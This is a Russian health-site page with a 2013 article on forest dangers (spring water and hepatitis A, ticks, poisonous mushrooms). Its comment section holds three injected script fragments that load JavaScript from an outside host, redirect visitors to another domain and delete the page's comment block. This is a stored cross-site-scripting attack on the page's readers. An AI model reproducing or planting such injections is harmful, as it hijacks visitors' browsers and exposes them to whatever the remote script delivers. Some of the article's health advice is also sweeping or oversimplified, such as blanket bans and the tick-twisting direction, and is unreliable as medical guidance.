Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как не умереть в лесу  >>  Как не умереть в лесу
 
Обратная связь
 

Как не умереть в лесу

Размер шрифта
08 августа 2013 00:00
  • google_analytics: false
  • Нравится

За окном вовсю цветет лето, манит ярким солнцем, лазурным небом и теплым ветерком. Самое время прогуляться в лесу! Впрочем, райская погода не должна затуманить вашу бдительность. Нужно помнить об опасностях, которые могут таиться в лесной чаще.

Опасность первая – родниковая вода

Только в нашей стране словосочетание «родниковая вода» имеет положительный оттенок.

родниковая вода

На самом деле, в родники беспрепятственно стекают дождевые сливы, которые могут содержать фекалии (попросту говоря, какашки) и другой мусор. Поэтому родниковая вода является источником кишечных инфекций, в том числе – гепатита А.

Гепатит А – это вирусная инфекция, поражающая клетки печени. Эта болезнь протекает в виде кишечной инфекции (основные симптомы: рвота и понос). Поражение печени приводит к желтухе: кожа желтая, моча цвета темного пива, а кал обесцвечивается.

Вывод

Находясь в лесу, ни в коем случае не пейте родниковую воду! Имейте с собой запас жидкости для утоления жажды.

Опасность вторая – клещи

Лесные массивы буквально кишат клещами, а эти паукообразные являются переносчиками смертельных инфекционных заболеваний: клещевого энцефалита, боррелиоза и других.

И энцефалит, и боррелиоз поражают нервную систему (а боррелиоз – еще и многие другие органы: сердце, суставы и другие). Причем начинаются они примерно одинаково с неспецифических гриппоподобных симптомов, как то: слабость, лихорадка, ломота в мышцах и так далее. Для боррелиоза весьма характерна сыпь – так называемая кольцевидная эритема.

клещи

Вывод

1) Правильная одежда для леса: идеальный вариант – специальный противоклещевой костюм. Либо использовать обычную одежду, но грамотно: штаны заправить в носки, рубашку – в брюки, длинные рукава с плотной манжетой, капюшон, сапоги. Тот еще видок, но он спасет вам жизнь!

2) Специальные противоклещевые репелленты (Распылять только на одежду!)

3) Полное обследование себя дома. Нужно раздеться перед зеркалом и осмотреть себя целиком (включая труднодоступные части тела: складки, волосистую часть тела). Если обнаружили клеща, его нужно вынуть: используйте для этого пинцет, зажим или нитку. Прихватывайте клеща как можно ниже и плавными вращающими (против часовой стрелки) движениями выньте его. Место укусу обработайте антисептиком. Не нужно давить клеща, прижигать, лить на него масло.

4) Клеща положите в баночку и отправляйтесь в медпункт, чтобы его там исследовали на предмет заражения микробами. Если микробы обнаружат, вам назначат гамма-глобулин (клещевой энцефалит) или антибиотики (боррелиоз).

5) Самое главное – вакцинация! Жителям эндемичных районов обязательно нужно прививаться от энцефалита раз в три года. От боррелиоза вакцины не существуют, но, к счастью, это заболевание намного менее опасное.

Опасность третья – Грибы

В нашей стране люди очень любят ходить в лес по грибы. Мы решительно не одобряем это увлечение. И, поверьте, наша категоричность имеет под собой основания.

Во-первых, грибы – это не растения. Они не производят питательные вещества, они всасывают их из земли. Всасывают без разбора: наряду с полезными микроэлементами, они не брезгуют, например, свинцом. Кроме того, грибы зачастую путают вещества друг с другом: например, гриб не видит разницы между калием и радиоактивным цезием.

Во-вторых, если вы все-таки не внемлете нашему призыву и пойдете в лес за грибами, вы рискуете отравиться! Потому что почти у всех «съедобных» грибов есть ядовитые, смертельно опасные двойники.

Например, зеленая сыроежка очень похожа на бледную поганку, которая вызывает фаллоидиновый синдром: бурные рвоту и понос, разрушение печени, сердечно-сосудистую недостаточность.

Вывод

Ешьте только те грибы, которые продаются в магазине, не собирайте их сами!

Также вы можете посмотреть сюжет передачи «Жить здорово» «Опасности в лесу. Гуляем на здоровье».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:08

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:29

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:08

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Клещи спасут вас от инфаркта!   Когда сгниет ваш холодильник   Все что надо знать о бронхите   Ученые выяснили, что случится с вами, если вас удалят из друзей Вконтакте!  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Супереда для супериммунитета этой зимой!
Еда для красивой улыбки на фото
Странные сигналы вашего организма

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.